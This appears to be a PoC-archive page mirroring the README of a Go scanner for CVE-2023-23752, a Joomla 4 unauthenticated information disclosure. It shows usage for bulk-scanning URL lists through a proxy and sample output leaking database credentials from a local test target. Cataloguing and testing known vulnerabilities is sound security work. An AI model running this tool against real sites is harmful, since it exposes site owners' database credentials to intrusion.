Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-23752 PoC — [20230201] - Core - Improper access check in webservice endpoints

Source
Associated Vulnerability
Title:[20230201] - Core - Improper access check in webservice endpoints (CVE-2023-23752)
Description:An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
Description
CVE-2023-23752 Joomla Unauthenticated Information Disclosure
Readme
# CVE-2023-23752
CVE-2023-23752 Joomla Unauthenticated Information Disclosure

## Description

+ 支持高并发检测
+ 将`url`写入`urls.txt`,只支持`http://ip:port & https://ip:port` 格式
+ 使用`-p`参数添加代理
+ Just run

## Usage

### Help

```powershell
.\CVE-2023-23752.exe -h

         ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗███████╗██████╗
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗╚════██║██╔════╝╚════██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝    ██╔╝███████╗ █████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝  ╚═══██╗   ██╔╝ ╚════██║██╔═══╝
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗██████╔╝   ██║  ███████║███████╗
         ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚═════╝    ╚═╝  ╚══════╝╚══════╝

        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note:CVE-2023-23752 Joomla Unauthenticated Information Disclosure
        @Warn: 代码仅供学习使用,请勿用于其他用途

Usage of CVE-2023-23752.exe:
  -p string
        Proxy Url
```

### Run

```powershell
.\CVE-2023-23752.exe

         ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗███████╗██████╗
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗╚════██║██╔════╝╚════██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝    ██╔╝███████╗ █████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝  ╚═══██╗   ██╔╝ ╚════██║██╔═══╝
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗██████╔╝   ██║  ███████║███████╗
         ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚═════╝    ╚═╝  ╚══════╝╚══════╝

        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note:CVE-2023-23752 Joomla Unauthenticated Information Disclosure
        @Warn: 代码仅供学习使用,请勿用于其他用途

2023-12-13 11:24:14 WARN Target: http://127.0.0.1:8080
2023-12-13 11:24:14 INFO Dbtype: mysqli
2023-12-13 11:24:14 INFO Host: joomladb
2023-12-13 11:24:14 INFO User: root
2023-12-13 11:24:14 INFO Password: example
2023-12-13 11:24:14 INFO Dbprefix: dm2vs_
```

File Snapshot

[4.0K] /data/pocs/ce5c55753abc67e688c22beef45e0ae3acdbc576 ├── [5.5K] CVE-2023-23752.go ├── [ 722] go.mod ├── [6.9K] go.sum ├── [1.0K] LICENSE ├── [4.5K] README.md └── [ 44] urls.txt 0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →